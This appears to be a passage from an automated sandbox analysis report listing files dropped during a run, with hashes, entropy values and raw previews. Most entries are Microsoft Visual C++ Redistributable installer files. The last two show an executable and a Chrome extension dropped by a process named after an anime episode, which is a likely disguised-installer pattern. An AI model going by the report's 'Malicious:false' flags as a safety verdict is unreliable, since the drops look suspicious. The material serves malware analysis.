                                                                        SHA-256:F80926604E503697247353F56856B31DE0B3FC1319F1C94068363952549CC9B1
                                                                        SHA-512:DB91A14FC27E3A62324E024DD44E3B5548AF7E1C021201C3D851BD2F32537885AACFC64ADAE619BAC31B60229D1D5FC653F5301CD7187C69BD0ACECCE817D6A3
                                                                        Malicious:false
                                                                        Preview:{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Tahoma;}{\f1\fnil\fcharset238 Tahoma;}{\f2\fnil\fcharset238 Garamond;}{\f3\fnil\fcharset2 Symbol;}}..{\colortbl ;\red0\green32\blue96;\red0\green0\blue255;}..{\*\generator Riched20 10.0.19041}\viewkind4\uc1 ..\pard\sb120\sa120\sl240\slmult1\b\f0\fs20\lang9 MICROSOFT YAZILIMI L\f1\u304?SANS KO\'aaULLARI\par..\f0 MICROSOFT VISUAL C++ 2015 - 2022 \'c7ALI\f1\'aaMA S\f0\'dcRESI \par..\b0 Bu lisans ko\f1\'baullar\u305?, Microsoft Corporation (veya ya\'baad\u305?\u287?\u305?n\u305?z yere g\f0\'f6re bir ba\f1\u287?l\u305? \'bairketi) ile sizin aran\u305?zda yap\u305?lan s\f0\'f6zle\f1\'bameyi olu\'baturur. Bu ko\'baullar, yukar\u305?da ad\u305? ge\f0\'e7en yaz\f1\u305?l\u305?m i\f0\'e7in ge\'e7erlidir. \f1\'aaartlar, yaz\u305?l\u305?m i\f0\'e7in t\'fcm Microsoft hizmetleri veya g\'fcncelle\f1\'batirmeleri i\f0\'e7in, beraberlerinde farkl\f1\u305? \'baartlar bulunmad\u305?\u287?\u305? s\f0\'fcrece ge\'e7erlidir.\pa

                                                                        C:\Users\user\AppData\Local\Temp\{9B8C7EDA-2539-42FC-9E66-AE939366FE45}\.ba\1055\thm.wxl

                                                                        Download File
                                                                        Process:C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exe
                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):3221
                                                                        Entropy (8bit):5.280530692056262
                                                                        Encrypted:false
                                                                        SSDEEP:48:c5DiTlOaesHEqhDTHV4zVy6oBzdp0DYK2GP2ZmN3majyNXNoNKQXVvChcPc+WKb0:uDiTl3PHcIflKNTPgdi12xgg
                                                                        MD5:DEFBEA001DC4EB66553630AC7CE47CCA
                                                                        SHA1:90CED64EC7C861F03484B5D5616FDBCDA8F64788
                                                                        SHA-256:E5ABE3CB3BF84207DAC4E6F5BBA1E693341D01AEA076DD2D91EAA21C6A6CB925
                                                                        SHA-512:B3B7A22D0CDADA21A977F1DCEAF2D73212A4CDDBD298532B1AC97575F36113D45E8D71C60A6D8F8CC2E9DBF18EE1000167CFBF0B2E7ED6F05462D77E0BCA0E90
                                                                        Malicious:false
                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. .. Copyright (c) Microsoft Corporation. All rights reserved...-->..<WixLocalization Culture="en-us" xmlns="http://schemas.microsoft.com/wix/2006/localization">.. <Control Control="EulaAcceptCheckbox" X="11" Y="-41" Width="-11" Height="29"/>.... <String Id="Caption">[WixBundleName] Kurulumu</String>.. <String Id="Title">[WixBundleName]</String>.. <String Id="ConfirmCancelMessage">.ptal etmek istedi.inizden emin misiniz?</String>.. <String Id="HelpHeader">Kurulum Yard.m.</String>.. <String Id="HelpText">/install | /repair | /uninstall | /layout [dizin] - y.kler, onar.r, kald.r.r ya da.. dizindeki paketin tam bir yerel kopyas.n. olu.turur. Varsay.lan install de.eridir...../passive | /quiet - en az d.zeyde istemsiz UI g.sterir ya da hi. UI g.stermez ve.. istem yoktur. Varsay.lan olarak UI ve t.m istemler g.r.nt.lenir...../norestart - yeniden ba.lama denemelerini engeller. Varsay.lan olarak UI yeniden ba.l

                                                                        C:\Users\user\AppData\Local\Temp\{9B8C7EDA-2539-42FC-9E66-AE939366FE45}\.ba\2052\license.rtf

                                                                        Download File
                                                                        Process:C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exe
                                                                        File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
                                                                        Category:dropped
                                                                        Size (bytes):18214
                                                                        Entropy (8bit):3.9837154113926356
                                                                        Encrypted:false
                                                                        SSDEEP:192:Hom4PyAjs/HBJ5qyK3PG4lk5xxKyAW1yW7/Y3OKchGMvGMLdo4+uHq9f4yPxrdCX:IDM1OR5rGU2
                                                                        MD5:D083C7E300928A0C5AEA5ECBD1653836
                                                                        SHA1:08F4F1F9F7DFA593BE3977515635967CE7A99E7A
                                                                        SHA-256:A808B4933CE3B3E0893504DBEF43EBF90B8B567F94BD6481B6315ED9141E1B11
                                                                        SHA-512:8CB3FFAD879BABA36137B7A21B62D9D6C530693F5E16FBB975F3E7C20F1DB5A686F3A6EE406D69B018AA494E4CD185F71B369A378AE3289B8080105157E63FD0
                                                                        Malicious:false
                                                                        Preview:{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Tahoma;}{\f1\fnil\fcharset134 SimSun;}{\f2\fnil\fcharset2 Symbol;}}..{\colortbl ;\red0\green32\blue96;\red0\green0\blue255;}..{\*\generator Riched20 10.0.19041}\viewkind4\uc1 ..\pard\sb120\sa120\sl240\slmult1\b\f0\fs20\lang9 Microsoft \f1\'c8\'ed\'bc\'fe\'d0\'ed\'bf\'c9\'cc\'f5\'bf\'ee\f0\par..MICROSOFT VISUAL C++ 2015 - 2022 RUNTIME \par..\b0\f1\'d5\'e2\'d0\'a9\'d0\'ed\'bf\'c9\'cc\'f5\'bf\'ee\'ca\'c7\f0 Microsoft Corporation\f1\'a3\'a8\'bb\'f2\'c4\'fa\'cb\'f9\'d4\'da\'b5\'d8\'b5\'c4\f0 Microsoft \f1\'b9\'d8\'c1\'aa\'b9\'ab\'cb\'be\'a3\'a9\'d3\'eb\'c4\'fa\'d6\'ae\'bc\'e4\'b4\'ef\'b3\'c9\'b5\'c4\'d0\'ad\'d2\'e9\'a1\'a3\'d5\'e2\'d0\'a9\'cc\'f5\'bf\'ee\'ca\'ca\'d3\'c3\'d3\'da\'c9\'cf\'ca\'f6\'c8\'ed\'bc\'fe\'a1\'a3\'d5\'e2\'d0\'a9\'cc\'f5\'bf\'ee\'d2\'b2\'ca\'ca\'d3\'c3\'d3\'da\'d5\'eb\'b6\'d4\'b8\'c3\'c8\'ed\'bc\'fe\'b5\'c4\'c8\'ce\'ba\'ce\f0 Microsoft \f1\'b7\'fe\'ce\'f1\'bb\'f2\'b8\'fc\'d0\'c2\'a3\'ac\'

                                                                        C:\Users\user\AppData\Local\Temp\{9B8C7EDA-2539-42FC-9E66-AE939366FE45}\.ba\2052\thm.wxl

                                                                        Download File
                                                                        Process:C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exe
                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):2978
                                                                        Entropy (8bit):6.135205733555905
                                                                        Encrypted:false
                                                                        SSDEEP:48:c5DiTlOtKesi+hDtkQf7lz+W0gopN3m5+3cNONeN1ra8vWqPtlTKxKUTKlKXRoR+:uDiTlV5kQR9GLeE0ZxV6gIV
                                                                        MD5:3D1E15DEEACE801322E222969A574F17
                                                                        SHA1:58074C83775E1A884FED6679ACF9AC78ABB8A169
                                                                        SHA-256:2AC8B7C19A5189662DE36A0581C90DBAD96DF259EC00A28F609B644C3F39F9CA
                                                                        SHA-512:10797919845C57C5831234E866D730EBD13255E5BF8BA8087D53F1D0FC5D72DC6D5F6945DBEBEE69ACC6A2E20378750C4B78083AE0390632743C184532358E10
                                                                        Malicious:false
                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. .. Copyright (c) Microsoft Corporation. All rights reserved...-->..<WixLocalization Culture="en-us" xmlns="http://schemas.microsoft.com/wix/2006/localization">.. <Control Control="EulaAcceptCheckbox" X="11" Y="-41" Width="-11" Height="29"/>.... <String Id="Caption">[WixBundleName] ....</String>.. <String Id="Title">[WixBundleName]</String>.. <String Id="ConfirmCancelMessage">.......?</String>.. <String Id="HelpHeader">......</String>.. <String Id="HelpText">/install | /repair | /uninstall | /layout [..] - .......... ..................Install ........../passive | /quiet - ..... UI ......... UI ... ........ UI ........../norestart - ..................... UI.../log log.txt - ............. %TEMP% ...

                                                                        C:\Users\user\AppData\Local\Temp\{9B8C7EDA-2539-42FC-9E66-AE939366FE45}\.ba\3082\license.rtf

                                                                        Download File
                                                                        Process:C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exe
                                                                        File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
                                                                        Category:dropped
                                                                        Size (bytes):10825
                                                                        Entropy (8bit):5.1113252296046126
                                                                        Encrypted:false
                                                                        SSDEEP:192:HalhwTwQ4yzePBrarlvTteQH3bf9WaoXUBXZRaS9YARl0hcXNVD32:6lc4krlU2ymLN12
                                                                        MD5:873A413D23F830D3E87DAB3B94153E08
                                                                        SHA1:24CFC24F22CEF89818718A86F55F27606EB42668
                                                                        SHA-256:ABC11BB2B04DFF6AFE2D4D4F40D95A7D62E5AF352928AF90DAA3DADE58DD59BD
                                                                        SHA-512:DC1ECCB5CC4D3047401E2BC31F5EB3E21C7881C02744A2E63C10D3C911D1158DCFAC023988E873C33DC381C989304FE1D3CB27ED99D7801285C4C378553CD821
                                                                        Malicious:false
                                                                        Preview:{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Tahoma;}{\f1\fnil\fcharset0 Garamond;}{\f2\fnil\fcharset2 Symbol;}}..{\colortbl ;\red0\green32\blue96;\red0\green0\blue255;}..{\*\generator Riched20 10.0.19041}\viewkind4\uc1 ..\pard\sb120\sa120\sl240\slmult1\b\f0\fs20\lang9 T\'c9RMINOS DE LICENCIA DEL SOFTWARE DE MICROSOFT\par..MICROSOFT VISUAL C++ 2015 - 2022 RUNTIME \par..\b0 Los t\'e9rminos de esta licencia son un contrato entre Microsoft Corporation (o, en funci\'f3n de donde viva, una de las sociedades del grupo) y usted. Se aplican al software mencionado anteriormente. Los t\'e9rminos tambi\'e9n se aplican a los servicios o actualizaciones de software de Microsoft, excepto en la medida en que sus t\'e9rminos sean diferentes.\par..\b SI USTED CUMPLE LOS PRESENTES T\'c9RMINOS DE ESTA LICENCIA, DISPONDR\'c1 DE LOS DERECHOS QUE A CONTINUACI\'d3N SE DESCRIBEN.\par....\pard{\pntext\f2\'B7\tab}{\*\pn\pnlvlblt\pnf2\pnindent360{\pntxtb\'B7}}\fi-357\li357\sb1

                                                                        C:\Users\user\AppData\Local\Temp\{9B8C7EDA-2539-42FC-9E66-AE939366FE45}\.ba\3082\thm.wxl

                                                                        Download File
                                                                        Process:C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exe
                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):3265
                                                                        Entropy (8bit):5.0491645049584655
                                                                        Encrypted:false
                                                                        SSDEEP:48:c5DiTlO/esS6VGhDv4tiUiyRUqzC4U+aD6N3m7xNh1NWNGbPz+9o3PWeKK9K9KfT:uDiTlxouUTiySqyIwz9sgxqvjIk8
                                                                        MD5:47F9F8D342C9C22D0C9636BC7362FA8F
                                                                        SHA1:3922D1589E284CE76AB39800E2B064F71123C1C5
                                                                        SHA-256:9CBB2B312C100B309A1B1495E84E2228B937612885F7A642FBBD67969B632C3A
                                                                        SHA-512:E458DF875E9B0622AEBE3C1449868AA6A2826A1F851DB71165A872B2897CF870CCF85046944FF51FFC13BB15E54E9D9424EC36CAF5A2F38CE8B7D6DC0E9B2363
                                                                        Malicious:false
                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. .. Copyright (c) Microsoft Corporation. All rights reserved...-->..<WixLocalization Culture="en-us" xmlns="http://schemas.microsoft.com/wix/2006/localization">.. <Control Control="EulaAcceptCheckbox" X="11" Y="-41" Width="-11" Height="29"/>.... <String Id="Caption">Instalaci.n de [WixBundleName]</String>.. <String Id="Title">[WixBundleName]</String>.. <String Id="ConfirmCancelMessage">.Est. seguro de que desea cancelar la operaci.n?</String>.. <String Id="HelpHeader">Ayuda de configuraci.n</String>.. <String Id="HelpText">/install | /repair | /uninstall | /layout [directory] - instala, repara, desinstala o.. crea una copia local completa del paquete en el directorio. La opci.n predeterminada es la instalaci.n...../passive | /quiet - muestra una IU m.nima sin solicitudes o no muestra ninguna IU ni.. solicitud. De forma predeterminada, se muestran la IU y todas las solicitudes...../norestart - elimina cualquier intento

                                                                        C:\Users\user\AppData\Local\Temp\{9B8C7EDA-2539-42FC-9E66-AE939366FE45}\.ba\BootstrapperApplicationData.xml

                                                                        Download File
                                                                        Process:C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exe
                                                                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (633), with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):15190
                                                                        Entropy (8bit):3.74084833991537
                                                                        Encrypted:false
                                                                        SSDEEP:192:X0svJBDnH5zHqQHG0Hd8Hz7HE06HA0rH3ptp2AtHxLUrMzLG0LxdtHJy5F0KI0Ba:X0sR9dLbmnoNLtR0AJtdt0IJVEpJEn
                                                                        MD5:F3ABECB590DEEF79A0892160C2951749
                                                                        SHA1:9481FA8A90EB63AED453487807B9325887345060
                                                                        SHA-256:045B724A294FB71687E9327E76094DDD13CD9A4D1064B13A411BE10302E05D0F
                                                                        SHA-512:74A401778D776A853DFE628B0EBAFFFFD4A8024F1C490A1F800176BF787A984CFD7416F8758CA49A36881572FD3296B7487C703076E274E1C7FB557446B99B44
                                                                        Malicious:false
                                                                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".u.t.f.-.1.6.".?.>.....<.B.o.o.t.s.t.r.a.p.p.e.r.A.p.p.l.i.c.a.t.i.o.n.D.a.t.a. .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.x./.2.0.1.0./.B.o.o.t.s.t.r.a.p.p.e.r.A.p.p.l.i.c.a.t.i.o.n.D.a.t.a.".>..... . .<.W.i.x.B.a.l.C.o.n.d.i.t.i.o.n. .C.o.n.d.i.t.i.o.n.=.".V.e.r.s.i.o.n.N.T. .&.g.t.;.=. .v.6...1.". .M.e.s.s.a.g.e.=.".[.W.i.x.B.u.n.d.l.e.N.a.m.e.]. .c.a.n. .o.n.l.y. .b.e. .i.n.s.t.a.l.l.e.d. .o.n. .W.i.n.d.o.w.s. .7. .a.n.d. .n.e.w.e.r. .p.l.a.t.f.o.r.m.s...". ./.>..... . .<.W.i.x.B.u.n.d.l.e.P.r.o.p.e.r.t.i.e.s. .D.i.s.p.l.a.y.N.a.m.e.=.".M.i.c.r.o.s.o.f.t. .V.i.s.u.a.l. .C.+.+. .2.0.1.5.-.2.0.2.2. .R.e.d.i.s.t.r.i.b.u.t.a.b.l.e. .(.x.6.4.). .-. .1.4...3.4...3.1.9.3.1.". .L.o.g.P.a.t.h.V.a.r.i.a.b.l.e.=.".W.i.x.B.u.n.d.l.e.L.o.g.". .C.o.m.p.r.e.s.s.e.d.=.".y.e.s.". .I.d.=.".{.d.4.c.e.c.f.3.b.-.b.6.8.f.-.4.9.9.5.-.8.8.4.0.-.5.2.e.a.0.f.a.b.6.4.6.e.}.". .U.p.g.r.a.d.e.C.o.d.e.=.".{.C.1.4.6.E.

                                                                        C:\Users\user\AppData\Local\Temp\{9B8C7EDA-2539-42FC-9E66-AE939366FE45}\.ba\license.rtf

                                                                        Download File
                                                                        Process:C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exe
                                                                        File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
                                                                        Category:dropped
                                                                        Size (bytes):9235
                                                                        Entropy (8bit):5.167332119309966
                                                                        Encrypted:false
                                                                        SSDEEP:192:H8kZ1UVDWkiWZTIsp/4hghFF1Qf4lCfnEtHixEGx736wHqItfSpOtJ32:cM1RWZMi/zzlOnjt5HLoa2
                                                                        MD5:04B33F0A9081C10E85D0E495A1294F83
                                                                        SHA1:1EFE2FB2D014A731B752672745F9FFECDD716412
                                                                        SHA-256:8099DC3CF9502C335DA829E5C755948A12E3E6DE490EB492A99DEB673D883D8B
                                                                        SHA-512:D1DBED00DF921169DD61501E2A3E95E6D7807348B188BE9DD8FC63423501E4D848ECE19AC466C3CACFCCC6084E0EB2F457DC957990F6F511DF10FD426E432685
                                                                        Malicious:false
                                                                        Preview:{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Tahoma;}{\f1\fnil\fcharset0 Garamond;}{\f2\fnil\fcharset2 Symbol;}}..{\colortbl ;\red0\green32\blue96;\red0\green0\blue255;}..{\*\generator Riched20 10.0.19041}\viewkind4\uc1 ..\pard\sb120\sa120\sl240\slmult1\b\f0\fs20\lang9 MICROSOFT SOFTWARE LICENSE TERMS\par..MICROSOFT VISUAL C++ 2015 - 2022 RUNTIME \par..\b0 These license terms are an agreement between Microsoft Corporation (or based on where you live, one of its affiliates) and you. They apply to the software named above. The terms also apply to any Microsoft services or updates for the software, except to the extent those have different terms.\par..\b IF YOU COMPLY WITH THESE LICENSE TERMS, YOU HAVE THE RIGHTS BELOW.\par....\pard{\pntext\f2\'B7\tab}{\*\pn\pnlvlblt\pnf2\pnindent360{\pntxtb\'B7}}\fi-357\li357\sb120\sa120\sl240\slmult1\tx360 INSTALLATION AND USE RIGHTS. \b0\par....\pard{\pntext\f2\'B7\tab}{\*\pn\pnlvlblt\pnf2\pnindent360{\pntxtb\'B7}}\f

                                                                        C:\Users\user\AppData\Local\Temp\{9B8C7EDA-2539-42FC-9E66-AE939366FE45}\.ba\logo.png

                                                                        Download File
                                                                        Process:C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exe
                                                                        File Type:PNG image data, 64 x 64, 8-bit colormap, non-interlaced
                                                                        Category:dropped
                                                                        Size (bytes):1861
                                                                        Entropy (8bit):6.868587546770907
                                                                        Encrypted:false
                                                                        SSDEEP:24:q36cnTKM/3kTIQiBmYKHeQWalGt1Sj9kYIt1uZ+bYOQe0IChR95aW:qqiTKMPuUBm7eQJGtYJM1uZCVszaW
                                                                        MD5:D6BD210F227442B3362493D046CEA233
                                                                        SHA1:FF286AC8370FC655AEA0EF35E9CF0BFCB6D698DE
                                                                        SHA-256:335A256D4779EC5DCF283D007FB56FD8211BBCAF47DCD70FE60DED6A112744EF
                                                                        SHA-512:464AAAB9E08DE610AD34B97D4076E92DC04C2CDC6669F60BFC50F0F9CE5D71C31B8943BD84CEE1A04FB9AB5BBED3442BD41D9CB21A0DD170EA97C463E1CE2B5B
                                                                        Malicious:false
                                                                        Preview:.PNG........IHDR...@...@.............sRGB.........gAMA......a.....PLTE].q^.r_.r_.s`.s`.s`.ta.ta.ub.ub.vc.vd.vd.vd.we.we.xe.xg.yg yg zh zh"zi"{j#|i${j$|n*~n*.n,.o,.p..q0.r2.s3.t5.x;.x<.y>.z?.|B.~C.}E..F..F..H..I..J..L..O..P..W..Y..^..a..c..g..i..q..r..}.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................S......pHYs..%...%....^.....tEXtSoftware.Paint.NET v3.5.100.r.....IDATXG..iW.@...EJ.$M...`AEpG..7TpWT@\.."....(..(.._;...di:9.c>q..g....T...._...-....F..+..w.

                                                                        C:\Users\user\AppData\Local\Temp\{9B8C7EDA-2539-42FC-9E66-AE939366FE45}\.ba\thm.wxl

                                                                        Download File
                                                                        Process:C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exe
                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):2952
                                                                        Entropy (8bit):5.052095286906672
                                                                        Encrypted:false
                                                                        SSDEEP:48:c5DiTl/+desK19hDUNKwsqq8+JIDxN3mt7NlN1NVvAdMcgLPDHVXK8KTKjKnSnYF:uDiTl/BbTxmup/vrxATd
                                                                        MD5:FBFCBC4DACC566A3C426F43CE10907B6
                                                                        SHA1:63C45F9A771161740E100FAF710F30EED017D723
                                                                        SHA-256:70400F181D00E1769774FF36BCD8B1AB5FBC431418067D31B876D18CC04EF4CE
                                                                        SHA-512:063FB6685EE8D2FA57863A74D66A83C819FE848BA3072B6E7D1B4FE397A9B24A1037183BB2FDA776033C0936BE83888A6456AAE947E240521E2AB75D984EE35E
                                                                        Malicious:false
                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. .. Copyright (c) Microsoft Corporation. All rights reserved...-->..<WixLocalization Culture="en-us" xmlns="http://schemas.microsoft.com/wix/2006/localization">.. <Control Control="EulaAcceptCheckbox" X="11" Y="-41" Width="-11" Height="29" />.... <String Id="Caption">[WixBundleName] Setup</String>.. <String Id="Title">[WixBundleName]</String>.. <String Id="ConfirmCancelMessage">Are you sure you want to cancel?</String>.. <String Id="HelpHeader">Setup Help</String>.. <String Id="HelpText">/install | /repair | /uninstall | /layout [directory] - installs, repairs, uninstalls or.. creates a complete local copy of the bundle in directory. Install is the default...../passive | /quiet - displays minimal UI with no prompts or displays no UI and.. no prompts. By default UI and all prompts are displayed...../norestart - suppress any attempts to restart. By default UI will prompt before restart.../log log.txt - logs to a specific file. B

                                                                        C:\Users\user\AppData\Local\Temp\{9B8C7EDA-2539-42FC-9E66-AE939366FE45}\.ba\thm.xml

                                                                        Download File
                                                                        Process:C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exe
                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):8332
                                                                        Entropy (8bit):5.184632608060528
                                                                        Encrypted:false
                                                                        SSDEEP:96:8L2HdQG+3VzHfz96zYFGaPSWXdhRAmImlqFQKFBiUxn7Ke5A82rkO/pWk3nswP:ZHAzZ/3
                                                                        MD5:F62729C6D2540015E072514226C121C7
                                                                        SHA1:C1E189D693F41AC2EAFCC363F7890FC0FEA6979C
                                                                        SHA-256:F13BAE0EC08C91B4A315BB2D86EE48FADE597E7A5440DCE6F751F98A3A4D6916
                                                                        SHA-512:CBBFBFA7E013A2B85B78D71D32FDF65323534816978E7544CA6CEA5286A0F6E8E7E5FFC4C538200211F11B94373D5658732D5D8AA1D01F9CCFDBF20F154F1471
                                                                        Malicious:false
                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. Copyright (c) .NET Foundation and contributors. All rights reserved. Licensed under the Microsoft Reciprocal License. See LICENSE.TXT file in the project root for full license information. -->......<Theme xmlns="http://wixtoolset.org/schemas/thmutil/2010">.. <Window Width="485" Height="300" HexStyle="100a0000" FontId="0">#(loc.Caption)</Window>.. <Font Id="0" Height="-12" Weight="500" Foreground="000000" Background="FFFFFF">Segoe UI</Font>.. <Font Id="1" Height="-24" Weight="500" Foreground="000000">Segoe UI</Font>.. <Font Id="2" Height="-22" Weight="500" Foreground="666666">Segoe UI</Font>.. <Font Id="3" Height="-12" Weight="500" Foreground="000000" Background="FFFFFF">Segoe UI</Font>.. <Font Id="4" Height="-12" Weight="500" Foreground="ff0000" Background="FFFFFF" Underline="yes">Segoe UI</Font>.... <Image X="11" Y="11" Width="64" Height="64" ImageFile="logo.png" Visible="yes"/>.. <Text X="80" Y="11" Width="-11" Heig

                                                                        C:\Users\user\AppData\Local\Temp\{9B8C7EDA-2539-42FC-9E66-AE939366FE45}\.ba\wixstdba.dll

                                                                        Download File
                                                                        Process:C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exe
                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):195600
                                                                        Entropy (8bit):6.682530937585544
                                                                        Encrypted:false
                                                                        SSDEEP:3072:OXoiFK6b0k77I+QfaIl191rSJHvlalB+8BHkY6v53EfcUzN0m6I+WxBlnKzeZuqt:OXoQNb++gDrSJdr8BHkPh3wIgnK/IU1a
                                                                        MD5:EAB9CAF4277829ABDF6223EC1EFA0EDD
                                                                        SHA1:74862ECF349A9BEDD32699F2A7A4E00B4727543D
                                                                        SHA-256:A4EFBDB2CE55788FFE92A244CB775EFD475526EF5B61AD78DE2BCDFADDAC7041
                                                                        SHA-512:45B15ADE68E0A90EA7300AEB6DCA9BC9E347A63DBA5CE72A635957564D1BDF0B1584A5E34191916498850FC7B3B7ECFBCBFCB246B39DBF59D47F66BC825C6FD2
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........3..R...R...R..h.N..R..h.L.R..h.M..R.......R.......R.......R...*<..R...*,..R...R...S..K....R..K....R..N.@..R...R(..R..K....R..Rich.R..................PE..L......Z...........!................d.....................................................@..............................................................D......,.......T...............................@...............X............................text............................... ..`.rdata.............................@..@.data...............................@....gfids..............................@..@.rsrc...............................@..@.reloc..,...........................@..B........................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\WindowsApp\InstallExtension.exe (copy)

                                                                        Download File
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-4N7PP.tmp\Boku no Hero Academia 6th Season - Episode 13.tmp
                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):146560
                                                                        Entropy (8bit):5.240257973600313
                                                                        Encrypted:false
                                                                        SSDEEP:1536:rche1M8H7rrES/urgpZDaGCmVtbkPxLF:QhwH73EGur6laGCmVtoxx
                                                                        MD5:6B435C6EA00DA06603EA9927D489AB6A
                                                                        SHA1:4237CF8901992D1C6D2B45B4DD3DA9672104C2CF
                                                                        SHA-256:15F1DF0D80FA0DCBE5DCBDEDEBD8EA6D72A5C7972F13AA25216AEB8328790ED0
                                                                        SHA-512:3B555826024BDAF9F4B0C0C7B7CF60304143BE36E33F3D3F5D3ECACAF5550DDCF88E638612344D92A9E84E85505DE12886BEE5665A6D11033CC8059EE01C6E09
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........YI;.8'h.8'h.8'h.@.h.8'h.M#i.8'h.M$i.8'h.M"i.8'h.M&i.8'h.S!i.8'h.S&i.8'h.8&ho8'h!M.i.8'h!M.h.8'h.8.h.8'h!M%i.8'hRich.8'h........PE..d.....c.........."......R...........R.........@.............................P......^0....`..............................................................o...............*...@......P...p...............................8............p...............................text....P.......R.................. ..`.rdata...?...p...@...V..............@..@.data...h...........................@....pdata..............................@..@.rsrc....o.......p..................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\WindowsApp\apps-helper\apps.crx (copy)

                                                                        Download File
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-4N7PP.tmp\Boku no Hero Academia 6th Season - Episode 13.tmp
                                                                        File Type:Google Chrome extension, version 3
                                                                        Category:dropped
                                                                        Size (bytes):21965
                                                                        Entropy (8bit):7.877323467941546
                                                                        Encrypted:false
                                                                        SSDEEP:384:VPcg8r3Tv/D+gljnfFySA/Tv/D+gljnfFySA4Tv/D+gljnfFySAjLCdfjgEhiy:V0gUjH1JnfF2bH1JnfF2IH1JnfF2jLCl
                                                                        MD5:F02C46788D904EFD9F4BFBD47B875845
                                                                        SHA1:7F539A9151F5DAFE6DE10DB5DFBFE7E385C8C233
                                                                        SHA-256:3911FFEEAC85633086E25ACFA3E346892A948D95F27DF04F8A016DF8054087DE
                                                                        SHA-512:4F6CE616F7770B77EA79169643A67F2B69B7F938ADA9AD602287702D8E929684EB596A1B1EA406C0F7F583A1AC538C14EAB50D7E8E62DC6A3E69002985D91E28
                                                                        Malicious:false
                                                                        Preview:Cr24....E.........0.."0...*.H.............0............v..E.].tU$.,u.B.p^.........d....%y..@.....[.+x.2h..].o.....6Kv.f.;...$`..XI3.....Wn4.i_....WYLy....C31.i.&..RDp...=.^.G..a....Gb..]....G..|.j[|...ym..j.7.B.... +l.U..GN.%.1....j.eg..k.~..pL.x....C.jB..Q.e.05..).?^.51c...h..x?..\.&..$i...D%1]............,N...f.....1m.Q!..........P....Z.x!.U.|.jU3^c."..j...Go.m>.-.....b.P.p.<g..B.{Qvl%C.X.H.7....O1.....=.<.J...._~0.!fm.CC.V.UQ.=l:..U.,..9.....tF.E......w.6.........f;....n..#.l0.U..3...0u..D/>...+.'..FR....U....8.4*..S*......S......J.u..7yP........1Uk.st:.....#..yPK..-.....SZ.U.C..............manifest.json.....................T.n.0....?....l.n. H_.>n9.....ZSL$R.Rv. @?._./.R.d..[}.....hw..'.%.0z.....jk..v1.2F.@....ZU..l%&}.K.<....-W.H..`..r.5..C(0.[i.|m.#.P..l.L."%A...m.V...K.,..O.X.X....k_..8.i.+..*.l../....)T!Kgk...k..[zO.......%o.]Q..f;.n..Ic..6....Xk.J[.@.Y........,..r.K./>=}x.sw.j|9.[.U..>.,....Z. -..u*.#Y(.,V..8..*.<..T... p .q.u~}....|..]...K.3

